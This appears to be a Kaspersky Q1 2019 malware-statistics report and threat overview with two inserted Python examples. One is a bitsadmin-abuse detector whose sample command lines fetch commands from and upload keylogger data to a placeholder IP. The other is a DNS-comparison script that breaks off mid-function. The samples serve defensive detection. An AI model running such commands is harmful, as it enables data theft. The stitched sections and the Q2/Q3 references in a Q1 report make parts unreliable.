In Q1 2019, Egypt (13.46%) topped the leaderboard by number of unique IP addresses from which attempts were made to attack Kaspersky Lab’s traps. Second place by a small margin goes to China (13.19%), with Brazil (11.09%) in third.

Cybercriminals most often used telnet attacks to infect devices with one of the many Mirai family members.

Top 10 malware downloaded to infected IoT devices following a successful telnet attack

     Verdict                             %*
 1   Backdoor.Linux.Mirai.b              71.39
 2   Backdoor.Linux.Mirai.ba             20.15
 3   Backdoor.Linux.Mirai.au              4.85
 4   Backdoor.Linux.Mirai.c               1.35
 5   Backdoor.Linux.Mirai.h               1.23
 6   Backdoor.Linux.Mirai.bj              0.72
 7   Trojan-Downloader.Shell.Agent.p      0.06
 8   Backdoor.Linux.Hajime.b              0.06
 9   Backdoor.Linux.Mirai.s               0.06
10   Backdoor.Linux.Gafgyt.bj             0.04

* Share of malware in the total amount of malware downloaded to IoT devices following a successful telnet attack

It is worth noting that bots based on Mirai code make up most of the Top 10. There is nothing surprising about this, and the situation could persist for a long time given Mirai’s universality.

SSH-based attacks


Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab’s SSH traps, Q1 2019 (download)

Top 10 countries in which devices were located that carried out SSH-based attacks on Kaspersky Lab’s traps.

     Country    %*
 1   China      23.24
 2   US          9.60
 3   Russia      6.07
 4   Brazil      5.31
 5   Germany     4.20
 6   Vietnam     4.11
 7   France      3.88
 8   India       3.55
 9   Egypt       2.53
10   Korea       2.10

* Infected devices in the country as a percentage of the total number of infected IoT devices attacking via SSH

Most often, a successful SSH-based attack resulted in the following types of malware being downloaded to the victim’s device: Backdoor.Perl.Shellbot.cd, Backdoor.Perl.Tsunami.gen, and Trojan-Downloader.Shell.Agent.p.

Financial threats

Quarterly highlights

The banker Trojan DanaBot, detected in Q2, continued to grow actively. The new modification not only updated the communication protocol with the C&C center, but expanded the list of organizations targeted by the malware. Whereas last quarter the main targets were located in Australia and Poland, in Q3 organizations in Austria, Germany, and Italy were added.

Recall that DanaBot has a modular structure and can load additional plugins to intercept traffic, steal passwords, and hijack crypto wallets. The malware was distributed through spam mailings with a malicious office document, which was used to download the main body of the Trojan.

Financial threat statistics

In Q1 2019, Kaspersky Lab solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 243,604 users.


Number of unique users attacked by financial malware, Q1 2019 (download)

Attack geography

To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky Lab products that faced this threat during the reporting period out of all users of our products in that country.


Geography of banking malware attacks, Q1 2019 (download)

Top 10 countries by share of attacked users

Country*       %**
South Korea    2.2
China          2.1
Belarus        1.6
Venezuela      1.6
Serbia         1.6
Greece         1.5
Egypt          1.4
Pakistan       1.3
Cameroon       1.3
Zimbabwe       1.3

* Excluded are countries with relatively few Kaspersky Lab product users (under 10,000).
** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky Lab products in the country.

Top 10 banking malware families

     Name          Verdicts                              %*
 1   RTM           Trojan-Banker.Win32.RTM               27.42
 2   Zbot          Trojan.Win32.Zbot                     22.86
 3   Emotet        Backdoor.Win32.Emotet                  9.36
 4   Trickster     Trojan.Win32.Trickster                 6.57
 5   Nymaim        Trojan.Win32.Nymaim                    5.85
 6   Nimnul        Virus.Win32.Nimnul                     4.59
 7   SpyEye        Backdoor.Win32.SpyEye                  4.29
 8   Neurevt       Trojan.Win32.Neurevt                   3.56
 9   NeutrinoPOS   Trojan-Banker.Win32.NeutrinoPOS        2.64
10   Tinba         Trojan-Banker.Win32.Tinba              1.39

* Unique users attacked by this malware as a percentage of all users attacked by financial malware.

In Q1 2019, the familiar Trojan-Banker.Win32.RTM (27.4%), Trojan.Win32.Zbot (22.9%), and Backdoor.Win32.Emotet (9.4%) made up the Top 3. In fourth place was Trojan.Win32.Trickster (6.6%), and fifth was Trojan.Win32.Nymaim (5.9%).

Ransomware programs

Quarterly highlights

The most high-profile event of the quarter was probably the LockerGoga ransomware attack on several major companies. The ransomware code itself constitutes nothing new, but the large-scale infections attracted the attention of the media and the public. Such incidents yet again spotlight the issue of corporate and enterprise network security, because in the event of penetration, instead of using ransomware (which would immediately make itself felt), cybercriminals can install spyware and steal confidential data for years on end without being noticed.

A vulnerability was discovered in the popular WinRAR archiver that allows an arbitrary file to be placed in an arbitrary directory when unpacking an ACE archive. The cybercriminals did not miss the chance to assemble an archive that unpacks the executable file of the JNEC ransomware into the system autorun directory.

February saw attacks on network-attached storages (NAS), in which Trojan-Ransom.Linux.Cryptor malware was installed on the victim device, encrypting data on all attached drives using elliptic-curve cryptography. Such attacks are especially dangerous because NAS devices are often used to store backup copies of data. What’s more, the victim tends to be unaware that a separate device running Linux might be targeted by intruders.

Nomoreransom.org partners, in cooperation with cyber police, created a utility for decrypting files impacted by GandCrab (Trojan-Ransom.Win32.GandCrypt) up to and including version 5.1. It helps victims of the ransomware to restore access to their data without paying a ransom. Unfortunately, as is often the case, shortly after the public announcement, the cybercriminals updated the malware to version 5.2, which cannot be decrypted by this tool.

Statistics

Number of new modifications

The number of new modifications fell markedly against Q4 2018 to the level of Q3. Seven new families were identified in the collection.


Number of new ransomware modifications, Q1 2018 – Q1 2019

Number of users attacked by ransomware Trojans

In Q1 2019, Kaspersky Lab products defeated ransomware attacks against 284,489 unique KSN users.

In February, the number of attacked users decreased slightly compared with January; however, by March we recorded a rise in cybercriminal activity.


Number of unique users attacked by ransomware Trojans, Q1 2019

Attack geography


Geography of mobile ransomware Trojans, Q1 2019

Top 10 countries attacked by ransomware Trojans

     Country*       % of users attacked by cryptors**
 1   Bangladesh     8.11
 2   Uzbekistan     6.36
 3   Ethiopia       2.61
 4   Mozambique     2.28
 5   Nepal          2.09
 6   Vietnam        1.37
 7   Pakistan       1.14
 8   Afghanistan    1.13
 9   India          1.11
10   Indonesia      1.07

* Excluded are countries with relatively few Kaspersky Lab users (under 50,000).
** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country.

Top 10 most common families of ransomware Trojans

     Name                  Verdicts*                        Percentage of attacked users**
 1   WannaCry              Trojan-Ransom.Win32.Wanna        26.25
 2   (generic verdict)     Trojan-Ransom.Win32.Phny         18.98
 3   GandCrab              Trojan-Ransom.Win32.GandCrypt    12.33
 4   (generic verdict)     Trojan-Ransom.Win32.Crypmod       5.76
 5   Shade                 Trojan-Ransom.Win32.Shade         3.54
 6   (generic verdict)     Trojan-Ransom.Win32.Encoder       3.50
 7   PolyRansom/VirLock    Virus.Win32.PolyRansom            2.82
 8   (generic verdict)     Trojan-Ransom.Win32.Gen           2.02
 9   Crysis/Dharma         Trojan-Ransom.Win32.Crusis        1.51
10   (generic verdict)     Trojan-Ransom.Win32.Cryptor       1.20

* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data.
** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors.

Miners

Statistics

Number of new modifications

In Q1 2019, Kaspersky Lab solutions detected 11,971 new modifications of miners.


Number of new miner modifications, Q1 2019

Number of users attacked by miners

In Q1, we detected attacks using miners on the computers of 1,197,066 unique users of Kaspersky Lab products worldwide.


Number of unique users attacked by miners, Q1 2019

Attack geography


Number of unique users attacked by miners, Q1 2019

Top 10 countries by share of users attacked by miners

     Country*       %**
 1   Afghanistan    12.18
 2   Ethiopia       10.02
 3   Uzbekistan      7.97
 4   Kazakhstan      5.84
 5   Tanzania        4.73
 6   Ukraine         4.28
 7   Mozambique      4.17
 8   Belarus         3.84
 9   Bolivia         3.35
10   Pakistan        3.33

* Excluded are countries with relatively few Kaspersky Lab users (under 50,000).
** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky Lab products in the country.

Vulnerable applications used by cybercriminals

Statistics for Q1 2019 show that vulnerabilities in Microsoft Office are still being utilized more often than those in other applications, due to their easy exploitability and highly stable operation. The percentage of exploits for Microsoft Office did not change much compared to the previous quarter, amounting to 69%.


Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2019

This quarter’s most popular vulnerabilities in the Microsoft Office suite were CVE-2017-11882 and CVE-2018-0802. They relate to the Equation Editor component, and cause buffer overflow with subsequent remote code execution. Lagging behind the chart leaders by a factor of almost two is CVE-2017-8570, a logical vulnerability and an analog of the no less popular CVE-2017-0199. Next comes CVE-2017-8759, where an error in the SOAP WSDL parser caused malicious code to be injected and the computer to be infected. Microsoft Office vulnerabilities are overrepresented in the statistics partly due to the emergence of openly available generators of malicious documents that exploit these vulnerabilities.

In Q1, the share of detected vulnerabilities in browsers amounted to 14%, almost five times less than for Microsoft Office. Exploiting browser vulnerabilities is often a problem, since browser developers are forever coming up with new options to safeguard against certain types of vulnerabilities, while the techniques for bypassing them often require the use of entire vulnerability chains to achieve the objective, which significantly increases the cost of such attacks.

However, this does not mean that sophisticated attacks on browsers do not exist. A prime example is the actively exploited zero-day vulnerability CVE-2019-5786 in Google Chrome (https://securityaffairs.co/wordpress/82058/hacking/chrome-zero-day-cve-2019-5786.html). To bypass the sandbox, it was used in conjunction with an additional exploit for a vulnerability in the win32k.sys driver (CVE-2019-0808), with the targets being users of 32-bit versions of Windows 7.

It is fair to say that Q1 2019, like the quarter before it, was marked by a large number of targeted attacks using zero-days. Kaspersky Lab researchers found an actively exploited zero-day vulnerability in the Windows kernel, which was assigned the ID CVE-2019-0797. The vulnerability stems from race conditions caused by a lack of thread synchronization during undocumented system calls, resulting in a Use-After-Free. It is worth noting that CVE-2019-0797 is the fourth zero-day vulnerability for Windows found by Kaspersky Lab in recent months.

A remarkable event at the beginning of the year was the discovery by researchers of the CVE-2018-20250 vulnerability, which had existed for 19 years in the module for unpacking ACE archives in the WinRAR utility. This component lacks sufficient checks of the file path, and a specially created ACE archive allows cybercriminals to inject an executable file into the system autorun directory. The vulnerability was immediately used to start distributing malicious archives.

Despite the fact that two years have passed since the vulnerabilities in the FuzzBunch exploit kit (EternalBlue, EternalRomance, etc.) were patched, these attacks still occupy all the top positions in our statistics. This is facilitated by the ongoing growth of malware that uses these exploits as a vector to distribute itself inside corporate networks.

Attacks via web resources

The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected.

Countries that are sources of web-based attacks:

The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky Lab products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks.

To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q1 2019, Kaspersky Lab solutions blocked 843,096,461 attacks launched from online resources located in 203 countries across the globe. 113,640,221 unique URLs were recognized as malicious by Web Anti-Virus components.


Distribution of web attack sources by country, Q1 2019

This quarter, Web Anti-Virus was most active on resources located in the US.

Countries where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious programs that fall under the Malware class; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

     Country*       % of attacked users**
 1   Venezuela      29.76
 2   Algeria        25.10
 3   Greece         24.16
 4   Albania        23.57
 5   Estonia        20.27
 6   Moldova        20.09
 7   Ukraine        19.97
 8   Serbia         19.61
 9   Poland         18.89
10   Kyrgyzstan     18.36
11   Azerbaijan     18.28
12   Belarus        18.22
13   Tunisia        18.09
14   Latvia         17.62
15   Hungary        17.61
16   Bangladesh     17.17
17   Lithuania      16.71
18   Djibouti       16.66
19   Reunion        16.65
20   Tajikistan     16.61

* Excluded are countries with relatively few Kaspersky Lab users (under 10,000).
** Unique users targeted by Malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country.

These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data.

On average, 13.18% of Internet user computers worldwide experienced at least one Malware-class attack.


Geography of malicious web attacks in Q1 2019 (percentage of attacked users)

Local threats

Statistics on local infections of user computers are an important indicator. They include objects that penetrated the target computer through infecting files or removable media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera/phone memory cards, and external hard drives.

In Q1 2019, our File Anti-Virus detected 247,907,593 malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of users of Kaspersky Lab products on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

Note that as of this quarter, the rating includes only Malware-class attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

     Country*        % of attacked users**
 1   Uzbekistan      57.73
 2   Yemen           57.66
 3   Tajikistan      56.35
 4   Afghanistan     56.13
 5   Turkmenistan    55.42
 6   Kyrgyzstan      51.52
 7   Ethiopia        49.21
 8   Syria           47.64
 9   Iraq            46.16
10   Bangladesh      45.86
11   Sudan           45.72
12   Algeria         45.35
13   Laos            44.99
14   Venezuela       44.14
15   Mongolia        43.90
16   Myanmar         43.72
17   Libya           43.30
18   Bolivia         43.17
19   Belarus         43.04
20   Azerbaijan      42.93

* Excluded are countries with relatively few Kaspersky Lab users (under 10,000).
** Unique users on whose computers Malware-class local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country.

These statistics are based on detection verdicts returned by the OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera/phone memory cards, or external hard drives.

On average, 23.62% of user computers globally faced at least one Malware-class local threat in Q1.

IT threat evolution Q1 2019

23 May 2019 - 12:00

Targeted attacks and malware campaigns

Go Zebrocy

Zebrocy was first observed being used as a Sofacy backdoor in 2015. However, the collection of cases where this tool has been used mean that we consider it a subset of activity in its own right. On the basis of this threat actor’s past behaviour, we predicted last year that Zebrocy would continue to innovate in its malware development. The group has developed using Delphi, AutoIT, .NET, C# and PowerShell. Since May 2018, Zebrocy has added the “Go” language to its arsenal – the first time that we have observed a well-known APT threat actor deploy malware with this compiled open-source language.

Zebrocy continues to target government-related organizations in Central Asia, both in-country and in remote locations, as well as a new diplomatic target in the Middle East. The group also continued to innovate. Much of the spear-phishing remains thematically the same and continues to be characteristically high volume for a targeted attacker – a trend that is likely to continue. However, the remote locations of the Central Asian targets are becoming more spread out – including South Korea, the Netherlands and others. The focus to date has been on Windows, but we expect the group to continue making further innovations within its malware set – perhaps all their components will soon support every platform used by their victims, including Linux and Mac OS.

GreyEnergy overlap with Zebrocy

GreyEnergy is believed to be a successor to the BlackEnergy group (aka Sandworm), best known for its involvement in attacks on Ukrainian energy facilities in 2015 that led to power outages. Like its predecessor, GreyEnergy has been detected attacking industrial and ICS targets, mainly in Ukraine.

Kaspersky Lab ICS CERT has identified an overlap between GreyEnergy and Zebrocy.

No direct evidence exists as to the origins of GreyEnergy, but the links between GreyEnergy and Zebrocy suggest the groups are related. Kaspersky Lab researchers have detailed how both groups shared the same C2 (command-and-control) server infrastructure for a certain period of time and how both targeted the same organization almost simultaneously, which more or less confirms the relationship between the two.

Chafer uses Remexi malware to spy on Iran-based diplomatic agencies

Throughout autumn 2018, we analyzed a long-standing (and still active at that time) cyber-espionage campaign that primarily targeted foreign diplomatic entities in Iran. The attackers used an improved version of the Remexi malware, previously associated with an APT threat actor that Symantec calls Chafer. This group has been observed since at least 2015, but based on things such as compilation time-stamps, and C2 registration, it’s possible that the group has been active for even longer. Traditionally, Chafer has focused on targets inside Iran, although its interests clearly include other countries in the Middle East.

The attackers rely heavily on Microsoft technologies on both client and server sides. The Trojan uses standard Windows utilities such as the Microsoft BITS (Background Intelligent Transfer Service) “bitsadmin.exe” to receive commands and exfiltrate data. This data includes keystrokes, screenshots, and browser-related data such as cookies and history, decrypted where possible. The C2 is based on IIS using .ASP technology to handle the victims’ HTTP requests.
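The abuse of the BITS client described above is something a defender can look for in process-creation telemetry. The following detection logic is an added example, not code from the original post or from Kaspersky; the log lines, the host allowlist and the `.example` hosts are constructed for the example.

```python
"""Flag bitsadmin.exe invocations that pull from or push to hosts outside an
allowlist, or that register a program to run when a transfer job completes.
Constructed example; not the original post's code."""
import re
from urllib.parse import urlsplit

# Constructed allowlist: hosts your own update jobs legitimately talk to.
ALLOWED_HOSTS = {"updates.corp.example", "wsus.corp.example"}

# Constructed sample command lines, as a process-creation log (for example
# Sysmon event ID 1) would record them. Addresses are RFC 5737 documentation IPs.
SAMPLE_CMDLINES = [
    "bitsadmin.exe /transfer patchjob /download /priority normal "
    "http://wsus.corp.example/kb/patch.msu C:\\Windows\\Temp\\patch.msu",
    "bitsadmin.exe /transfer j1 /download /priority high "
    "http://203.0.113.45/c/get.php?id=7 C:\\Users\\Public\\cmd.txt",
    "bitsadmin.exe /create up1 && bitsadmin.exe /addfile up1 "
    "https://203.0.113.45/u/post.aspx C:\\Users\\Public\\kl.dat",
    "bitsadmin.exe /SetNotifyCmdLine job2 C:\\Users\\Public\\run.exe NULL",
    "notepad.exe C:\\Users\\alice\\notes.txt",
]

_URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
_SWITCH_RE = re.compile(r"/([A-Za-z]+)")


def flag_bits_command(cmdline, allowed_hosts=ALLOWED_HOSTS):
    """Return the reasons this command line deserves attention, or an empty
    list if it is not a bitsadmin invocation or looks benign."""
    if "bitsadmin" not in cmdline.lower():
        return []
    reasons = []
    # Any URL pointing at a host that is not on the allowlist is suspicious,
    # whether the job downloads (command retrieval) or uploads (exfiltration).
    for url in _URL_RE.findall(cmdline):
        host = (urlsplit(url).hostname or "").lower()
        if host not in allowed_hosts:
            reasons.append(f"transfer with non-allowlisted host {host}")
    # Strip URLs first so path segments are not mistaken for switches.
    switches = {s.lower() for s in _SWITCH_RE.findall(_URL_RE.sub("", cmdline))}
    if "setnotifycmdline" in switches:
        reasons.append("job configured to run a program on completion")
    return reasons


def scan(cmdlines, allowed_hosts=ALLOWED_HOSTS):
    """Return [(index, reasons)] for every command line that raised a flag."""
    hits = []
    for i, line in enumerate(cmdlines):
        reasons = flag_bits_command(line, allowed_hosts)
        if reasons:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for idx, why in scan(SAMPLE_CMDLINES):
        print(f"[{idx}] {SAMPLE_CMDLINES[idx]}\n     -> {'; '.join(why)}")
```

Legitimate update jobs to allowlisted hosts produce no hits, so the remaining lines are the ones worth triaging.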

New zero-day vulnerability exploited by APT threat actors

In February, our AEP (Automatic Exploit Prevention) systems detected an attempt to exploit a vulnerability in Windows – the fourth consecutive exploited Local Privilege Escalation vulnerability in Windows that we have discovered recently using our technologies. Further analysis led us to uncover a zero-day vulnerability in “win32k.sys”. We reported this to Microsoft on February 22, who confirmed the vulnerability and assigned it CVE-2019-0797. Microsoft released a patch on March 12, 2019, crediting Kaspersky Lab researchers Vasiliy Berdnikov and Boris Larin with the discovery. Just as with CVE-2018-8589, we believe that this exploit is being used by several threat actors, including, but possibly not limited to, FruityArmor and SandCat. While FruityArmor is known to have used zero-days before, SandCat is a new APT actor that we discovered only recently.

Lazarus continues to target crypto-currency exchanges

The Lazarus APT group is well-known for targeting financial organizations. In the middle of 2018, we published our report on ‘Operation AppleJeus‘, highlighting the threat actor’s focus on crypto-currency exchanges, using a fake company with a backdoored product aimed at crypto-currency businesses. One of the key findings was the group’s new ability to target Mac OS. Since then, Lazarus has expanded its operations for this platform. Further tracking of the group’s activities enabled us to discover a new operation, active since at least November 2018, which utilizes PowerShell to control Windows systems and Mac OS malware to target Apple customers.

The Lazarus group continues to update its TTPs (Tactics, Techniques and Procedures) to help it fly under the radar. We would urge organizations involved in the booming crypto-currency or technological startup industry to exercise extra caution when dealing with new third parties or installing software. It’s best to check new software with an anti-virus program or at least use popular free virus-scanning services such as VirusTotal. You should never set ‘Enable Content’ (macro scripting) in Microsoft Office documents received from new or untrusted sources. If you need to try out new applications, it’s better to do so offline or on an isolated network virtual machine which you can erase with a few clicks. For more details on this and other research, you can subscribe to our APT intelligence reports.

Under the [Shadow]Hammer

In January, we discovered a sophisticated supply-chain attack involving the ASUS Live Update Utility, used to deliver BIOS, UEFI and software updates to ASUS laptops and desktops. The attackers added a backdoor to the utility and then distributed it to users through official channels. ASUS has a wide install base, making this an attractive target for APT threat actors. The compromised version of the utility was distributed to a large number of people between June and November 2018. Our telemetry shows that 57,000 Kaspersky Lab customers downloaded and installed it, although we believe the real scale of the problem is much bigger, possibly affecting over a million users worldwide.

The goal of the attack was to surgically target an unknown pool of users, identified by their network adapter MAC addresses. The attackers hardcoded a list of MAC addresses in the Trojanized samples, which identifies the true targets of this massive operation. We were able to extract over 600 unique MAC addresses from more than 200 samples discovered in this attack, although it’s possible that other samples exist which target different MAC addresses. You can check if your MAC address is on the target list here.

Other malware news

Razy Trojan steals crypto-currency

While many browser extensions make our lives easier, some are altogether more dangerous, bombarding us with advertising or collecting information about our activities. Some are even designed to steal money. We recently reported the Razy Trojan, malware that installs a malicious browser extension on the victim’s computer or infects an already installed extension. To do so, it disables the integrity check for installed extensions and automatic updates for the targeted browser. The Trojan works with Google Chrome, Mozilla Firefox and Yandex browsers, though it has different infection scenarios for each browser type. Razy spreads via advertising blocks on websites and is distributed from free file-hosting services under the guise of legitimate software. Razy serves several purposes, mostly related to the theft of crypto-currency. Its main tool, the script ‘main.js’, is capable of searching for addresses of crypto-currency wallets on websites and replacing them with the attacker’s wallet addresses, spoofing images of QR codes pointing to wallets, modifying the web pages of crypto-currency exchanges and spoofing Google and Yandex search results.

Turning ATMs into slot machines

‘Jackpotting’ refers to the fraudulent methods used by criminals to obtain cash from ATMs. One recent example is the WinPot malware. The malware is notable because the criminals designed the user interface to resemble a slot machine.

However, unlike the machines in a casino, an ATM infected with WinPot always pays out – to the criminals. The malware window displays the denomination of banknotes for each cassette, so that the money mule operating the malware just needs to select the cassette with the most money in it and press ‘Spin’. The ‘Scan’ button can be used to recount the notes. The authors also include an emergency ‘Stop’ button, to allow the mule to cut short the pay out so as not to arouse suspicion.

There are several versions of the malware, and while their core functionality is essentially the same, there are some differences. For example, some versions will only dispense cash for a limited period of time and then they deactivate themselves. As with Cutlet Maker, WinPot is available on the Darknet for between $500 and $1,000, depending on the version.

To block attacks of this kind, we recommend that banks adopt device control and whitelisting. The former will block attempts to implant malware in the ATM using a USB device, while the latter will prevent execution of unauthorized software on the ATM. Kaspersky Embedded Systems Security can be used to secure ATMs.

Pirate Matryoshka

Using torrent trackers to spread malware is a well-known practice: cybercriminals disguise it as popular software, computer games, media files and other sought-after content. Earlier this year we detected one such campaign, when The Pirate Bay (TPB) tracker filled up with harmful files used to distribute malware under the guise of cracked copies of paid programs. The tracker contained malicious torrents created from dozens of different accounts, including some registered on TPB for quite some time. Instead of the expected software, the downloaded file was a Trojan, Pirate Matryoshka, whose basic logic was implemented by SetupFactory installers.

During the initial stage, the installer decrypts another SetupFactory installer to display a phishing web page. This page opens directly in the installation window and requests the user’s TPB account credentials, supposedly to continue the process. The second downloaded component is also a SetupFactory installer, used to decrypt and run four PE files in sequence. The second and fourth of these files are downloaders for the InstallCapital and MegaDowl file partner programs (which Kaspersky Lab classifies as adware). These usually find their way onto people’s computers through file sharing sites. Besides downloading the required content, their goal is to install additional software while carefully hiding the option to cancel.

The other two files are auto-clickers written in Visual Basic that are required to prevent the user from canceling the installation of additional software (in which case the cybercriminals would go away empty-handed). The auto-clickers are run before the installers: when the installer windows are detected, they check the boxes and click the buttons needed to give the user’s consent to install the unnecessary software.

Pirate Matryoshka results in the victim being flooded with unwanted programs. The owners of file partner programs often do not track the programs offered in their downloaders: our research shows that one in five files offered by partner installers is malicious, including pBot, Razy and others.

Mirai now used to target enterprise devices

Researchers from Palo Alto Networks’ Unit 42 recently reported a new variant of Mirai, the infamous IoT botnet. This malware is best known for its use in a massive DDoS attack on the servers of DNS provider Dyn, in 2016. The botnet is now equipped with a much wider range of exploits, which makes it even more dangerous and allows it to spread faster.

More troubling is the fact that the new strain is targeting not only its usual victims – routers, IP cameras, and other ‘smart’ things – but also enterprise IoT devices. This is no surprise since the Mirai source code was leaked some time ago, allowing any attacker with sufficient programming skills to use it. This explains why this botnet features highly in our report, ‘DDoS attacks in Q4 2018‘; and the fact that, in our report, ‘New trends in the world of IoT threats‘, Mirai is responsible for 21% of all IoT infections.

It is possible that future waves of Mirai infections might even include industrial IoT devices.

To reduce the risk of Mirai infection, we recommend that you install patches and firmware updates as soon as they become available, monitor traffic coming from each device for abnormalities, change default passwords and enforce an effective password policy for staff, and re-boot any device that is behaving strangely (this will remove the malware from the device, but will not, on its own, prevent re-infection). To help companies protect themselves against the latest IoT-related threats we have released a new intelligence data feed for IoT-related threats.

‘Collection #1’ and other data leaks

On January 17, security researcher Troy Hunt reported a leak of more than 773 million email addresses and 21 million unique passwords. The data, dubbed ‘Collection #1’, was originally shared on the popular cloud service MEGA. Collection #1 is just a small part of a bigger leak of about 1TB of data, split into seven parts and distributed through a data-trading forum. The full package is a collection of credentials leaked from different sources during the past few years, the most recent being from 2017, so we were unable to identify any more recent data in this ‘new’ leak. The new data dump, dubbed ‘Collection #2-5’, was discovered by researchers at the Hasso Plattner Institute in Potsdam.

In February, further data dumps occurred. Details of 617 million accounts, stolen from 16 hacked companies, were put up for sale on Dream Market, accessible via the Tor network. The hacked companies include Dubsmash, MyFitnessPal, Armor Games and CoffeeMeetsBagel. Subsequently, data from a further eight hacked companies was posted to the same market place. Then in March, the hacker behind the earlier data dumps posted stolen data from a further six companies.

One of the particularly worrying aspects of these leaks is the fact that not all of the companies affected had previously reported the data breaches.

The impact on a company affected by a data breach goes beyond the loss of data. It includes the costs of investigating the breach, closing any security loopholes and maintaining business continuity. On top of that, a company’s reputation can be affected, especially if it becomes clear that the company failed to take adequate steps to secure the personal data of its customers.

The impact on customers can also be dramatic, especially if they use the same login credentials to access other online services. You can find our advice on how to mitigate the impact of a data breach here.

Social engineering

In our threat predictions for 2019, we described social engineering as the most successful infection vector ever and indicated why we thought it would remain so. The key to its success lies in sparking the curiosity of potential victims. Massive data leaks, such as the ones discussed above, help attackers to fine-tune their approach, making it more successful. Phishers will latch on to any topic that they think will pique the interest of their victims. We saw this recently in a campaign that hooked into events in Venezuela.

On February 10, Juan Guaido made a public call for volunteers to join a new movement called ‘Voluntarios por Venezuela’ (Volunteers for Venezuela), to help international organizations deliver humanitarian aid to the country. The original website asks volunteers to provide their full name, personal ID, cell phone number, and whether they have a medical degree, a car, or a smartphone, and also their location. The volunteers sign up and then receive instructions on how to help.

Just a few days after the legitimate site appeared, an almost identical website appeared. Both the legitimate and fake sites used SSL from Let’s Encrypt. The scariest aspect was that these two different domains, with different owners, were resolved within Venezuela to the same IP address, belonging to the fake domain owner. So it didn’t matter if a volunteer opened the legitimate domain name or the fake one – in the end their personal information was injected into a fake site.

In this scenario, where DNS servers are being manipulated, we would strongly recommend using public DNS servers such as Google DNS servers (8.8.8.8 and 8.8.4.4) or CloudFlare and APNIC DNS servers (1.1.1.1 and 1.0.0.1). We also recommend using VPN connections without a third-party DNS.
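One way to notice the resolver manipulation described above from the client side is to compare what the local resolver answers with what the public resolvers named here answer. The following is an added example, not code from the Securelist post; the resolver labels, the domain names and the addresses in the sample are constructed, and only the stdlib is used.

```python
"""Compare a local resolver's A answers with public resolvers (added example).
Two names resolving to one address only via the local resolver, while public
resolvers disagree, is the pattern seen in the Venezuela case above.
"""
import secrets
import socket
import struct

# Public resolvers recommended in the text above.
PUBLIC_RESOLVERS = {"google": "8.8.8.8", "cloudflare": "1.1.1.1"}


def build_query(domain: str, txid: int) -> bytes:
    """Encode a single A/IN query for `domain` with the RD bit set."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    labels = domain.rstrip(".").split(".")
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels)
    return header + qname + b"\x00" + struct.pack("!HH", 1, 1)


def _skip_name(msg: bytes, off: int) -> int:
    """Return the offset just past a (possibly compressed) domain name."""
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:   # compression pointer: two bytes, ends the name
            return off + 2
        if length == 0:
            return off + 1
        off += 1 + length


def parse_a_records(msg: bytes, expected_txid: int) -> list[str]:
    """Return the sorted IPv4 answers in a response; reject a foreign ID."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", msg[:12])
    if txid != expected_txid or not flags & 0x8000:
        raise ValueError("not a response to our query")
    off = 12
    for _ in range(qdcount):
        off = _skip_name(msg, off) + 4            # skip QTYPE and QCLASS
    ips = []
    for _ in range(ancount):
        off = _skip_name(msg, off)
        rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        if rtype == 1 and rclass == 1 and rdlen == 4:
            ips.append(socket.inet_ntoa(msg[off:off + 4]))
        off += rdlen
    return sorted(ips)


def query_a(domain: str, resolver: str, timeout: float = 3.0) -> list[str]:
    """Ask `resolver` over UDP/53 for the A records of `domain` (needs network)."""
    txid = secrets.randbelow(0x10000)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_query(domain, txid), (resolver, 53))
        data, _ = sock.recvfrom(4096)
    return parse_a_records(data, txid)


def find_divergent(answers: dict[str, dict[str, list[str]]]) -> dict[str, list[str]]:
    """answers[resolver][domain] -> IP list; 'local' is the resolver under test.
    A domain is reported when its local answer shares no address with any
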